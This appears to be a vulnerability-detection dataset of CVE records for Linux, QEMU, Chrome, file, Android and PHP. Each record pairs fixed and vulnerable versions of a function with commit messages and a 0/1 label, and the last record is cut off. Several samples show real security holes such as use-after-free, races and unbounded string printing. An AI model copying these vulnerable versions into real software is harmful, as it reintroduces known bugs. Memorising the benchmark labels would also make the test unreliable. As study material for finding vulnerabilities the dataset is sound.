proc_reg_read+0xbc/0x180
do_loop_readv_writev+0x134/0x210
do_readv_writev+0x565/0x660
vfs_readv+0x67/0xa0
do_preadv+0x126/0x170
SyS_preadv+0xc/0x10
do_syscall_64+0x1a1/0x460
return_from_SYSCALL_64+0x0/0x6a
INFO: Freed in disk_seqf_stop+0x42/0x50 age=160 cpu=1 pid=315
__slab_free+0x17a/0x2c0
kfree+0x20a/0x220
disk_seqf_stop+0x42/0x50
traverse+0x3b5/0x860
seq_read+0x7e3/0x11a0
proc_reg_read+0xbc/0x180
do_loop_readv_writev+0x134/0x210
do_readv_writev+0x565/0x660
vfs_readv+0x67/0xa0
do_preadv+0x126/0x170
SyS_preadv+0xc/0x10
do_syscall_64+0x1a1/0x460
return_from_SYSCALL_64+0x0/0x6a
CPU: 1 PID: 315 Comm: trinity-c1 Tainted: G B 4.7.0+ #62
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
ffffea0002d96000 ffff880119b9f918 ffffffff81d6ce81 ffff88011a804480
ffff8800b6581500 ffff880119b9f948 ffffffff8146c7bd ffff88011a804480
ffffea0002d96000 ffff8800b6581500 fffffffffffffff4 ffff880119b9f970
Call Trace:
[<ffffffff81d6ce81>] dump_stack+0x65/0x84
[<ffffffff8146c7bd>] print_trailer+0x10d/0x1a0
[<ffffffff814704ff>] object_err+0x2f/0x40
[<ffffffff814754d1>] kasan_report_error+0x221/0x520
[<ffffffff8147590e>] __asan_report_load8_noabort+0x3e/0x40
[<ffffffff83888161>] klist_iter_exit+0x61/0x70
[<ffffffff82404389>] class_dev_iter_exit+0x9/0x10
[<ffffffff81d2e8ea>] disk_seqf_stop+0x3a/0x50
[<ffffffff8151f812>] seq_read+0x4b2/0x11a0
[<ffffffff815f8fdc>] proc_reg_read+0xbc/0x180
[<ffffffff814b24e4>] do_loop_readv_writev+0x134/0x210
[<ffffffff814b4c45>] do_readv_writev+0x565/0x660
[<ffffffff814b8a17>] vfs_readv+0x67/0xa0
[<ffffffff814b8de6>] do_preadv+0x126/0x170
[<ffffffff814b92ec>] SyS_preadv+0xc/0x10
This problem can occur in the following situation:
open()
- pread()
- .seq_start()
- iter = kmalloc() // succeeds
- seqf->private = iter
- .seq_stop()
- kfree(seqf->private)
- pread()
- .seq_start()
- iter = kmalloc() // fails
- .seq_stop()
- class_dev_iter_exit(seqf->private) // boom! old pointer
As the comment in disk_seqf_stop() says, stop is called even if start
failed, so we need to reinitialise the private pointer to NULL when seq
iteration stops.
An alternative would be to set the private pointer to NULL when the
kmalloc() in disk_seqf_start() fails.
Cc: stable@vger.kernel.org
Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Acked-by: Tejun Heo <tj@kernel.org>
Signed-off-by: Jens Axboe <axboe@fb.com> | void disk_unblock_events(struct gendisk *disk)
{
if (disk->ev)
__disk_unblock_events(disk, false);
}
| void disk_unblock_events(struct gendisk *disk)
{
if (disk->ev)
__disk_unblock_events(disk, false);
}
| C | linux | 0 |
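The root cause described in the commit message above is a ->stop() callback freeing seqf->private without clearing it, so a later ->stop() after a failed ->start() operates on a stale pointer. A minimal seq_file sketch of the fixed pattern; struct my_iter and the callbacks are hypothetical, not the genhd code.

#include <linux/seq_file.h>
#include <linux/slab.h>

struct my_iter {
	loff_t pos; /* hypothetical iterator state */
};

static void *my_seq_start(struct seq_file *seqf, loff_t *pos)
{
	struct my_iter *iter;

	iter = kmalloc(sizeof(*iter), GFP_KERNEL);
	if (!iter)
		return NULL; /* start failed; ->stop() will still be called */
	iter->pos = *pos;
	seqf->private = iter;
	return iter;
}

static void my_seq_stop(struct seq_file *seqf, void *v)
{
	struct my_iter *iter = seqf->private;

	/* ->stop() runs even after a failed ->start() and can run again on the
	 * next read; free the iterator and clear the pointer so a later call
	 * cannot free or dereference a stale value. */
	kfree(iter);
	seqf->private = NULL;
}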
CVE-2018-20815 | https://www.cvedetails.com/cve/CVE-2018-20815/ | CWE-119 | https://git.qemu.org/?p=qemu.git;a=commitdiff;h=da885fe1ee8b4589047484bd7fa05a4905b52b17 | da885fe1ee8b4589047484bd7fa05a4905b52b17 | null | void qemu_fdt_dumpdtb(void *fdt, int size)
{
const char *dumpdtb = qemu_opt_get(qemu_get_machine_opts(), "dumpdtb");
if (dumpdtb) {
/* Dump the dtb to a file and quit */
exit(g_file_set_contents(dumpdtb, fdt, size, NULL) ? 0 : 1);
}
}
| void qemu_fdt_dumpdtb(void *fdt, int size)
{
const char *dumpdtb = qemu_opt_get(qemu_get_machine_opts(), "dumpdtb");
if (dumpdtb) {
/* Dump the dtb to a file and quit */
exit(g_file_set_contents(dumpdtb, fdt, size, NULL) ? 0 : 1);
}
}
| C | qemu | 0 |
CVE-2017-5101 | https://www.cvedetails.com/cve/CVE-2017-5101/ | CWE-20 | https://github.com/chromium/chromium/commit/29734f46c6dc9362783091180c2ee279ad53637f | 29734f46c6dc9362783091180c2ee279ad53637f | media: remove base::SharedMemoryHandle usage in v4l2 encoder
This replaces a use of the legacy UnalignedSharedMemory ctor
taking a SharedMemoryHandle with the current ctor taking a
PlatformSharedMemoryRegion.
Bug: 849207
Change-Id: Iea24ebdcd941cf2fa97e19cf2aeac1a18f9773d9
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1697602
Commit-Queue: Matthew Cary (CET) <mattcary@chromium.org>
Reviewed-by: Ricky Liang <jcliang@chromium.org>
Cr-Commit-Position: refs/heads/master@{#681740} | bool V4L2JpegEncodeAccelerator::EncodedInstanceDmaBuf::SetInputBufferFormat(
gfx::Size coded_size,
const VideoFrameLayout& input_layout) {
DCHECK(parent_->encoder_task_runner_->BelongsToCurrentThread());
DCHECK(!input_streamon_);
DCHECK(input_job_queue_.empty());
constexpr uint32_t input_pix_fmt_candidates[] = {V4L2_PIX_FMT_NV12M,
V4L2_PIX_FMT_NV12};
struct v4l2_format format;
input_buffer_pixelformat_ = 0;
for (const auto input_pix_fmt : input_pix_fmt_candidates) {
DCHECK_EQ(V4L2Device::V4L2PixFmtToVideoPixelFormat(input_pix_fmt),
PIXEL_FORMAT_NV12);
memset(&format, 0, sizeof(format));
format.type = V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE;
format.fmt.pix_mp.num_planes = kMaxNV12Plane;
format.fmt.pix_mp.pixelformat = input_pix_fmt;
format.fmt.pix_mp.field = V4L2_FIELD_ANY;
format.fmt.pix_mp.width = coded_size.width();
format.fmt.pix_mp.height = coded_size.height();
auto num_planes = input_layout.num_planes();
for (size_t i = 0; i < num_planes; i++) {
format.fmt.pix_mp.plane_fmt[i].sizeimage = input_layout.planes()[i].size;
format.fmt.pix_mp.plane_fmt[i].bytesperline =
input_layout.planes()[i].stride;
}
if (device_->Ioctl(VIDIOC_S_FMT, &format) == 0 &&
format.fmt.pix_mp.pixelformat == input_pix_fmt) {
device_input_layout_ = V4L2Device::V4L2FormatToVideoFrameLayout(format);
input_buffer_pixelformat_ = format.fmt.pix_mp.pixelformat;
input_buffer_num_planes_ = format.fmt.pix_mp.num_planes;
input_buffer_height_ = format.fmt.pix_mp.height;
break;
}
}
if (input_buffer_pixelformat_ == 0) {
VLOGF(1) << "Neither NV12 nor NV12M is supported.";
return false;
}
if (format.fmt.pix_mp.width != static_cast<uint32_t>(coded_size.width()) ||
format.fmt.pix_mp.height != static_cast<uint32_t>(coded_size.height())) {
VLOGF(1) << "Width " << coded_size.width() << "->"
<< format.fmt.pix_mp.width << ",Height " << coded_size.height()
<< "->" << format.fmt.pix_mp.height;
return false;
}
return true;
}
| bool V4L2JpegEncodeAccelerator::EncodedInstanceDmaBuf::SetInputBufferFormat(
gfx::Size coded_size,
const VideoFrameLayout& input_layout) {
DCHECK(parent_->encoder_task_runner_->BelongsToCurrentThread());
DCHECK(!input_streamon_);
DCHECK(input_job_queue_.empty());
constexpr uint32_t input_pix_fmt_candidates[] = {V4L2_PIX_FMT_NV12M,
V4L2_PIX_FMT_NV12};
struct v4l2_format format;
input_buffer_pixelformat_ = 0;
for (const auto input_pix_fmt : input_pix_fmt_candidates) {
DCHECK_EQ(V4L2Device::V4L2PixFmtToVideoPixelFormat(input_pix_fmt),
PIXEL_FORMAT_NV12);
memset(&format, 0, sizeof(format));
format.type = V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE;
format.fmt.pix_mp.num_planes = kMaxNV12Plane;
format.fmt.pix_mp.pixelformat = input_pix_fmt;
format.fmt.pix_mp.field = V4L2_FIELD_ANY;
format.fmt.pix_mp.width = coded_size.width();
format.fmt.pix_mp.height = coded_size.height();
auto num_planes = input_layout.num_planes();
for (size_t i = 0; i < num_planes; i++) {
format.fmt.pix_mp.plane_fmt[i].sizeimage = input_layout.planes()[i].size;
format.fmt.pix_mp.plane_fmt[i].bytesperline =
input_layout.planes()[i].stride;
}
if (device_->Ioctl(VIDIOC_S_FMT, &format) == 0 &&
format.fmt.pix_mp.pixelformat == input_pix_fmt) {
device_input_layout_ = V4L2Device::V4L2FormatToVideoFrameLayout(format);
input_buffer_pixelformat_ = format.fmt.pix_mp.pixelformat;
input_buffer_num_planes_ = format.fmt.pix_mp.num_planes;
input_buffer_height_ = format.fmt.pix_mp.height;
break;
}
}
if (input_buffer_pixelformat_ == 0) {
VLOGF(1) << "Neither NV12 nor NV12M is supported.";
return false;
}
if (format.fmt.pix_mp.width != static_cast<uint32_t>(coded_size.width()) ||
format.fmt.pix_mp.height != static_cast<uint32_t>(coded_size.height())) {
VLOGF(1) << "Width " << coded_size.width() << "->"
<< format.fmt.pix_mp.width << ",Height " << coded_size.height()
<< "->" << format.fmt.pix_mp.height;
return false;
}
return true;
}
| C | Chrome | 0 |
CVE-2014-7906 | https://www.cvedetails.com/cve/CVE-2014-7906/ | CWE-399 | https://github.com/chromium/chromium/commit/3a2cf7d1376ae33054b878232fb38b8fbed29e31 | 3a2cf7d1376ae33054b878232fb38b8fbed29e31 | Pepper: Access PepperMediaDeviceManager through a WeakPtr
Its lifetime is scoped to the RenderFrame, and it might go away before the
hosts that refer to it.
BUG=423030
Review URL: https://codereview.chromium.org/653243003
Cr-Commit-Position: refs/heads/master@{#299897} | ScopedRequest(PepperDeviceEnumerationHostHelper* owner,
const Delegate::EnumerateDevicesCallback& callback)
: owner_(owner),
callback_(callback),
requested_(false),
request_id_(0),
sync_call_(false) {
if (!owner_->document_url_.is_valid())
return;
requested_ = true;
sync_call_ = true;
DCHECK(owner_->delegate_);
request_id_ = owner_->delegate_->EnumerateDevices(
owner_->device_type_,
owner_->document_url_,
base::Bind(&ScopedRequest::EnumerateDevicesCallbackBody, AsWeakPtr()));
sync_call_ = false;
}
| ScopedRequest(PepperDeviceEnumerationHostHelper* owner,
const Delegate::EnumerateDevicesCallback& callback)
: owner_(owner),
callback_(callback),
requested_(false),
request_id_(0),
sync_call_(false) {
if (!owner_->document_url_.is_valid())
return;
requested_ = true;
sync_call_ = true;
request_id_ = owner_->delegate_->EnumerateDevices(
owner_->device_type_,
owner_->document_url_,
base::Bind(&ScopedRequest::EnumerateDevicesCallbackBody, AsWeakPtr()));
sync_call_ = false;
}
| C | Chrome | 1 |
CVE-2018-6061 | https://www.cvedetails.com/cve/CVE-2018-6061/ | CWE-362 | https://github.com/chromium/chromium/commit/70340ce072cee8a0bdcddb5f312d32567b2269f6 | 70340ce072cee8a0bdcddb5f312d32567b2269f6 | vaapi vda: Delete owned objects on worker thread in Cleanup()
This CL adds a SEQUENCE_CHECKER to Vaapi*Accelerator classes, and
posts the destruction of those objects to the appropriate thread on
Cleanup().
Also makes {H264,VP8,VP9}Picture RefCountedThreadSafe, see miu@
comment in
https://chromium-review.googlesource.com/c/chromium/src/+/794091#message-a64bed985cfaf8a19499a517bb110a7ce581dc0f
TEST=play back VP9/VP8/H264 w/ simplechrome on soraka, Release build
unstripped, let video play for a few seconds then navigate back; no
crashes. Unittests as before:
video_decode_accelerator_unittest --test_video_data=test-25fps.vp9:320:240:250:250:35:150:12
video_decode_accelerator_unittest --test_video_data=test-25fps.vp8:320:240:250:250:35:150:11
video_decode_accelerator_unittest --test_video_data=test-25fps.h264:320:240:250:258:35:150:1
Bug: 789160
Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Change-Id: I7d96aaf89c92bf46f00c8b8b36798e057a842ed2
Reviewed-on: https://chromium-review.googlesource.com/794091
Reviewed-by: Pawel Osciak <posciak@chromium.org>
Commit-Queue: Miguel Casas <mcasas@chromium.org>
Cr-Commit-Position: refs/heads/master@{#523372} | VaapiVideoDecodeAccelerator::VaapiVP8Accelerator::VaapiVP8Accelerator(
VaapiVideoDecodeAccelerator* vaapi_dec,
VaapiWrapper* vaapi_wrapper)
: vaapi_wrapper_(vaapi_wrapper), vaapi_dec_(vaapi_dec) {
DCHECK(vaapi_wrapper_);
DCHECK(vaapi_dec_);
DETACH_FROM_SEQUENCE(sequence_checker_);
}
| VaapiVideoDecodeAccelerator::VaapiVP8Accelerator::VaapiVP8Accelerator(
VaapiVideoDecodeAccelerator* vaapi_dec,
VaapiWrapper* vaapi_wrapper)
: vaapi_wrapper_(vaapi_wrapper), vaapi_dec_(vaapi_dec) {
DCHECK(vaapi_wrapper_);
DCHECK(vaapi_dec_);
}
| C | Chrome | 1 |
CVE-2014-9621 | https://www.cvedetails.com/cve/CVE-2014-9621/ | CWE-399 | https://github.com/file/file/commit/65437cee25199dbd385fb35901bc0011e164276c | 65437cee25199dbd385fb35901bc0011e164276c | Limit string printing to 100 chars, and add flags I forgot in the previous
commit. | donote(struct magic_set *ms, void *vbuf, size_t offset, size_t size,
int clazz, int swap, size_t align, int *flags, uint16_t *notecount)
{
Elf32_Nhdr nh32;
Elf64_Nhdr nh64;
size_t noff, doff;
uint32_t namesz, descsz;
unsigned char *nbuf = CAST(unsigned char *, vbuf);
if (*notecount == 0)
return 0;
--*notecount;
if (xnh_sizeof + offset > size) {
/*
* We're out of note headers.
*/
return xnh_sizeof + offset;
}
(void)memcpy(xnh_addr, &nbuf[offset], xnh_sizeof);
offset += xnh_sizeof;
namesz = xnh_namesz;
descsz = xnh_descsz;
if ((namesz == 0) && (descsz == 0)) {
/*
* We're out of note headers.
*/
return (offset >= size) ? offset : size;
}
if (namesz & 0x80000000) {
(void)file_printf(ms, ", bad note name size 0x%lx",
(unsigned long)namesz);
return 0;
}
if (descsz & 0x80000000) {
(void)file_printf(ms, ", bad note description size 0x%lx",
(unsigned long)descsz);
return 0;
}
noff = offset;
doff = ELF_ALIGN(offset + namesz);
if (offset + namesz > size) {
/*
* We're past the end of the buffer.
*/
return doff;
}
offset = ELF_ALIGN(doff + descsz);
if (doff + descsz > size) {
/*
* We're past the end of the buffer.
*/
return (offset >= size) ? offset : size;
}
if ((*flags & FLAGS_DID_OS_NOTE) == 0) {
if (do_os_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_BUILD_ID) == 0) {
if (do_bid_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_NETBSD_PAX) == 0) {
if (do_pax_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_CORE) == 0) {
if (do_core_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags, size, clazz))
return size;
}
if (namesz == 7 && strcmp((char *)&nbuf[noff], "NetBSD") == 0) {
if (descsz > 100)
descsz = 100;
switch (xnh_type) {
case NT_NETBSD_VERSION:
return size;
case NT_NETBSD_MARCH:
if (*flags & FLAGS_DID_NETBSD_MARCH)
return size;
*flags |= FLAGS_DID_NETBSD_MARCH;
if (file_printf(ms, ", compiled for: %.*s",
(int)descsz, (const char *)&nbuf[doff]) == -1)
return size;
break;
case NT_NETBSD_CMODEL:
if (*flags & FLAGS_DID_NETBSD_CMODEL)
return size;
*flags |= FLAGS_DID_NETBSD_CMODEL;
if (file_printf(ms, ", compiler model: %.*s",
(int)descsz, (const char *)&nbuf[doff]) == -1)
return size;
break;
default:
if (*flags & FLAGS_DID_NETBSD_UNKNOWN)
return size;
*flags |= FLAGS_DID_NETBSD_UNKNOWN;
if (file_printf(ms, ", note=%u", xnh_type) == -1)
return size;
break;
}
return size;
}
return offset;
}
| donote(struct magic_set *ms, void *vbuf, size_t offset, size_t size,
int clazz, int swap, size_t align, int *flags, uint16_t *notecount)
{
Elf32_Nhdr nh32;
Elf64_Nhdr nh64;
size_t noff, doff;
uint32_t namesz, descsz;
unsigned char *nbuf = CAST(unsigned char *, vbuf);
if (*notecount == 0)
return 0;
--*notecount;
if (xnh_sizeof + offset > size) {
/*
* We're out of note headers.
*/
return xnh_sizeof + offset;
}
(void)memcpy(xnh_addr, &nbuf[offset], xnh_sizeof);
offset += xnh_sizeof;
namesz = xnh_namesz;
descsz = xnh_descsz;
if ((namesz == 0) && (descsz == 0)) {
/*
* We're out of note headers.
*/
return (offset >= size) ? offset : size;
}
if (namesz & 0x80000000) {
(void)file_printf(ms, ", bad note name size 0x%lx",
(unsigned long)namesz);
return 0;
}
if (descsz & 0x80000000) {
(void)file_printf(ms, ", bad note description size 0x%lx",
(unsigned long)descsz);
return 0;
}
noff = offset;
doff = ELF_ALIGN(offset + namesz);
if (offset + namesz > size) {
/*
* We're past the end of the buffer.
*/
return doff;
}
offset = ELF_ALIGN(doff + descsz);
if (doff + descsz > size) {
/*
* We're past the end of the buffer.
*/
return (offset >= size) ? offset : size;
}
if ((*flags & FLAGS_DID_OS_NOTE) == 0) {
if (do_os_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_BUILD_ID) == 0) {
if (do_bid_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_NETBSD_PAX) == 0) {
if (do_pax_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_CORE) == 0) {
if (do_core_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags, size, clazz))
return size;
}
if (namesz == 7 && strcmp((char *)&nbuf[noff], "NetBSD") == 0) {
switch (xnh_type) {
case NT_NETBSD_VERSION:
return size;
case NT_NETBSD_MARCH:
if (*flags & FLAGS_DID_NETBSD_MARCH)
return size;
if (file_printf(ms, ", compiled for: %.*s", (int)descsz,
(const char *)&nbuf[doff]) == -1)
return size;
break;
case NT_NETBSD_CMODEL:
if (*flags & FLAGS_DID_NETBSD_CMODEL)
return size;
if (file_printf(ms, ", compiler model: %.*s",
(int)descsz, (const char *)&nbuf[doff]) == -1)
return size;
break;
default:
if (*flags & FLAGS_DID_NETBSD_UNKNOWN)
return size;
if (file_printf(ms, ", note=%u", xnh_type) == -1)
return size;
break;
}
return size;
}
return offset;
}
| C | file | 1 |
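The mitigation in the record above caps an attacker-controlled length before it is used as the precision of a %.*s conversion. A standalone sketch of the same clamp; the 100-byte limit mirrors the patch, the surrounding names are made up.

#include <stdio.h>

#define MAX_PRINT_LEN 100 /* cap taken from the patch above */

/* Print at most MAX_PRINT_LEN bytes of a buffer whose claimed length
 * comes from untrusted input and may be far larger than what is sane. */
static void print_note_string(const unsigned char *buf, size_t claimed_len)
{
	if (claimed_len > MAX_PRINT_LEN)
		claimed_len = MAX_PRINT_LEN;
	printf("compiled for: %.*s\n", (int)claimed_len, (const char *)buf);
}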
CVE-2016-0810 | https://www.cvedetails.com/cve/CVE-2016-0810/ | CWE-264 | https://android.googlesource.com/platform%2Fframeworks%2Fav/+/19c47afbc402542720ddd280e1bbde3b2277b586 | 19c47afbc402542720ddd280e1bbde3b2277b586 | DO NOT MERGE SoundPool: add lock for findSample access from SoundPoolThread
Sample decoding still occurs in SoundPoolThread
without holding the SoundPool lock.
Bug: 25781119
Change-Id: I11fde005aa9cf5438e0390a0d2dfe0ec1dd282e8
| bool SoundPool::unload(int sampleID)
{
ALOGV("unload: sampleID=%d", sampleID);
Mutex::Autolock lock(&mLock);
return mSamples.removeItem(sampleID);
}
| bool SoundPool::unload(int sampleID)
{
ALOGV("unload: sampleID=%d", sampleID);
Mutex::Autolock lock(&mLock);
return mSamples.removeItem(sampleID);
}
| C | Android | 0 |
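The commit above serializes sample-map lookups from the SoundPoolThread with the same lock the caller side uses. A generic C sketch of that locking pattern with pthreads; the structures and helpers are hypothetical, not the Android classes.

#include <pthread.h>
#include <stddef.h>

struct sample;

struct pool {
	pthread_mutex_t lock;
	/* ... id -> sample table, protected by lock ... */
};

/* Table lookup; caller must hold p->lock (hypothetical helper). */
struct sample *pool_lookup_locked(struct pool *p, int id);

/* Worker-thread path: take the same lock the owning thread uses for
 * insert/remove, so the entry cannot disappear mid-lookup. The real
 * SoundPool code additionally returns a reference-counted handle so the
 * sample stays alive after the lock is dropped; that part is omitted. */
struct sample *pool_find_sample(struct pool *p, int id)
{
	struct sample *s;

	pthread_mutex_lock(&p->lock);
	s = pool_lookup_locked(p, id);
	pthread_mutex_unlock(&p->lock);
	return s;
}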
CVE-2017-11144 | https://www.cvedetails.com/cve/CVE-2017-11144/ | CWE-754 | https://git.php.net/?p=php-src.git;a=commit;h=91826a311dd37f4c4e5d605fa7af331e80ddd4c3 | 91826a311dd37f4c4e5d605fa7af331e80ddd4c3 | null | PHP_FUNCTION(openssl_pkey_get_details)
{
zval *key;
EVP_PKEY *pkey;
BIO *out;
unsigned int pbio_len;
char *pbio;
zend_long ktype;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &key) == FAILURE) {
return;
}
if ((pkey = (EVP_PKEY *)zend_fetch_resource(Z_RES_P(key), "OpenSSL key", le_key)) == NULL) {
RETURN_FALSE;
}
out = BIO_new(BIO_s_mem());
if (!PEM_write_bio_PUBKEY(out, pkey)) {
BIO_free(out);
php_openssl_store_errors();
RETURN_FALSE;
}
pbio_len = BIO_get_mem_data(out, &pbio);
array_init(return_value);
add_assoc_long(return_value, "bits", EVP_PKEY_bits(pkey));
add_assoc_stringl(return_value, "key", pbio, pbio_len);
/*TODO: Use the real values once the openssl constants are used
* See the enum at the top of this file
*/
switch (EVP_PKEY_base_id(pkey)) {
case EVP_PKEY_RSA:
case EVP_PKEY_RSA2:
{
RSA *rsa = EVP_PKEY_get0_RSA(pkey);
ktype = OPENSSL_KEYTYPE_RSA;
if (rsa != NULL) {
zval z_rsa;
const BIGNUM *n, *e, *d, *p, *q, *dmp1, *dmq1, *iqmp;
RSA_get0_key(rsa, &n, &e, &d);
RSA_get0_factors(rsa, &p, &q);
RSA_get0_crt_params(rsa, &dmp1, &dmq1, &iqmp);
array_init(&z_rsa);
OPENSSL_PKEY_GET_BN(z_rsa, n);
OPENSSL_PKEY_GET_BN(z_rsa, e);
OPENSSL_PKEY_GET_BN(z_rsa, d);
OPENSSL_PKEY_GET_BN(z_rsa, p);
OPENSSL_PKEY_GET_BN(z_rsa, q);
OPENSSL_PKEY_GET_BN(z_rsa, dmp1);
OPENSSL_PKEY_GET_BN(z_rsa, dmq1);
OPENSSL_PKEY_GET_BN(z_rsa, iqmp);
add_assoc_zval(return_value, "rsa", &z_rsa);
}
}
break;
case EVP_PKEY_DSA:
case EVP_PKEY_DSA2:
case EVP_PKEY_DSA3:
case EVP_PKEY_DSA4:
{
DSA *dsa = EVP_PKEY_get0_DSA(pkey);
ktype = OPENSSL_KEYTYPE_DSA;
if (dsa != NULL) {
zval z_dsa;
const BIGNUM *p, *q, *g, *priv_key, *pub_key;
DSA_get0_pqg(dsa, &p, &q, &g);
DSA_get0_key(dsa, &pub_key, &priv_key);
array_init(&z_dsa);
OPENSSL_PKEY_GET_BN(z_dsa, p);
OPENSSL_PKEY_GET_BN(z_dsa, q);
OPENSSL_PKEY_GET_BN(z_dsa, g);
OPENSSL_PKEY_GET_BN(z_dsa, priv_key);
OPENSSL_PKEY_GET_BN(z_dsa, pub_key);
add_assoc_zval(return_value, "dsa", &z_dsa);
}
}
break;
case EVP_PKEY_DH:
{
DH *dh = EVP_PKEY_get0_DH(pkey);
ktype = OPENSSL_KEYTYPE_DH;
if (dh != NULL) {
zval z_dh;
const BIGNUM *p, *q, *g, *priv_key, *pub_key;
DH_get0_pqg(dh, &p, &q, &g);
DH_get0_key(dh, &pub_key, &priv_key);
array_init(&z_dh);
OPENSSL_PKEY_GET_BN(z_dh, p);
OPENSSL_PKEY_GET_BN(z_dh, g);
OPENSSL_PKEY_GET_BN(z_dh, priv_key);
OPENSSL_PKEY_GET_BN(z_dh, pub_key);
add_assoc_zval(return_value, "dh", &z_dh);
}
}
break;
#ifdef HAVE_EVP_PKEY_EC
case EVP_PKEY_EC:
ktype = OPENSSL_KEYTYPE_EC;
if (EVP_PKEY_get0_EC_KEY(pkey) != NULL) {
zval ec;
const EC_GROUP *ec_group;
const EC_POINT *pub;
int nid;
char *crv_sn;
ASN1_OBJECT *obj;
char oir_buf[80];
const EC_KEY *ec_key = EVP_PKEY_get0_EC_KEY(pkey);
BIGNUM *x = BN_new();
BIGNUM *y = BN_new();
const BIGNUM *d;
ec_group = EC_KEY_get0_group(ec_key);
nid = EC_GROUP_get_curve_name(ec_group);
if (nid == NID_undef) {
break;
}
array_init(&ec);
crv_sn = (char*) OBJ_nid2sn(nid);
if (crv_sn != NULL) {
add_assoc_string(&ec, "curve_name", crv_sn);
}
obj = OBJ_nid2obj(nid);
if (obj != NULL) {
int oir_len = OBJ_obj2txt(oir_buf, sizeof(oir_buf), obj, 1);
add_assoc_stringl(&ec, "curve_oid", (char*) oir_buf, oir_len);
ASN1_OBJECT_free(obj);
}
pub = EC_KEY_get0_public_key(ec_key);
if (EC_POINT_get_affine_coordinates_GFp(ec_group, pub, x, y, NULL)) {
OPENSSL_GET_BN(ec, x, x);
OPENSSL_GET_BN(ec, y, y);
} else {
php_openssl_store_errors();
}
if ((d = EC_KEY_get0_private_key(EVP_PKEY_get0_EC_KEY(pkey))) != NULL) {
OPENSSL_GET_BN(ec, d, d);
}
add_assoc_zval(return_value, "ec", &ec);
BN_free(x);
BN_free(y);
}
break;
#endif
default:
ktype = -1;
break;
}
add_assoc_long(return_value, "type", ktype);
BIO_free(out);
}
| PHP_FUNCTION(openssl_pkey_get_details)
{
zval *key;
EVP_PKEY *pkey;
BIO *out;
unsigned int pbio_len;
char *pbio;
zend_long ktype;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &key) == FAILURE) {
return;
}
if ((pkey = (EVP_PKEY *)zend_fetch_resource(Z_RES_P(key), "OpenSSL key", le_key)) == NULL) {
RETURN_FALSE;
}
out = BIO_new(BIO_s_mem());
if (!PEM_write_bio_PUBKEY(out, pkey)) {
BIO_free(out);
php_openssl_store_errors();
RETURN_FALSE;
}
pbio_len = BIO_get_mem_data(out, &pbio);
array_init(return_value);
add_assoc_long(return_value, "bits", EVP_PKEY_bits(pkey));
add_assoc_stringl(return_value, "key", pbio, pbio_len);
/*TODO: Use the real values once the openssl constants are used
* See the enum at the top of this file
*/
switch (EVP_PKEY_base_id(pkey)) {
case EVP_PKEY_RSA:
case EVP_PKEY_RSA2:
{
RSA *rsa = EVP_PKEY_get0_RSA(pkey);
ktype = OPENSSL_KEYTYPE_RSA;
if (rsa != NULL) {
zval z_rsa;
const BIGNUM *n, *e, *d, *p, *q, *dmp1, *dmq1, *iqmp;
RSA_get0_key(rsa, &n, &e, &d);
RSA_get0_factors(rsa, &p, &q);
RSA_get0_crt_params(rsa, &dmp1, &dmq1, &iqmp);
array_init(&z_rsa);
OPENSSL_PKEY_GET_BN(z_rsa, n);
OPENSSL_PKEY_GET_BN(z_rsa, e);
OPENSSL_PKEY_GET_BN(z_rsa, d);
OPENSSL_PKEY_GET_BN(z_rsa, p);
OPENSSL_PKEY_GET_BN(z_rsa, q);
OPENSSL_PKEY_GET_BN(z_rsa, dmp1);
OPENSSL_PKEY_GET_BN(z_rsa, dmq1);
OPENSSL_PKEY_GET_BN(z_rsa, iqmp);
add_assoc_zval(return_value, "rsa", &z_rsa);
}
}
break;
case EVP_PKEY_DSA:
case EVP_PKEY_DSA2:
case EVP_PKEY_DSA3:
case EVP_PKEY_DSA4:
{
DSA *dsa = EVP_PKEY_get0_DSA(pkey);
ktype = OPENSSL_KEYTYPE_DSA;
if (dsa != NULL) {
zval z_dsa;
const BIGNUM *p, *q, *g, *priv_key, *pub_key;
DSA_get0_pqg(dsa, &p, &q, &g);
DSA_get0_key(dsa, &pub_key, &priv_key);
array_init(&z_dsa);
OPENSSL_PKEY_GET_BN(z_dsa, p);
OPENSSL_PKEY_GET_BN(z_dsa, q);
OPENSSL_PKEY_GET_BN(z_dsa, g);
OPENSSL_PKEY_GET_BN(z_dsa, priv_key);
OPENSSL_PKEY_GET_BN(z_dsa, pub_key);
add_assoc_zval(return_value, "dsa", &z_dsa);
}
}
break;
case EVP_PKEY_DH:
{
DH *dh = EVP_PKEY_get0_DH(pkey);
ktype = OPENSSL_KEYTYPE_DH;
if (dh != NULL) {
zval z_dh;
const BIGNUM *p, *q, *g, *priv_key, *pub_key;
DH_get0_pqg(dh, &p, &q, &g);
DH_get0_key(dh, &pub_key, &priv_key);
array_init(&z_dh);
OPENSSL_PKEY_GET_BN(z_dh, p);
OPENSSL_PKEY_GET_BN(z_dh, g);
OPENSSL_PKEY_GET_BN(z_dh, priv_key);
OPENSSL_PKEY_GET_BN(z_dh, pub_key);
add_assoc_zval(return_value, "dh", &z_dh);
}
}
break;
#ifdef HAVE_EVP_PKEY_EC
case EVP_PKEY_EC:
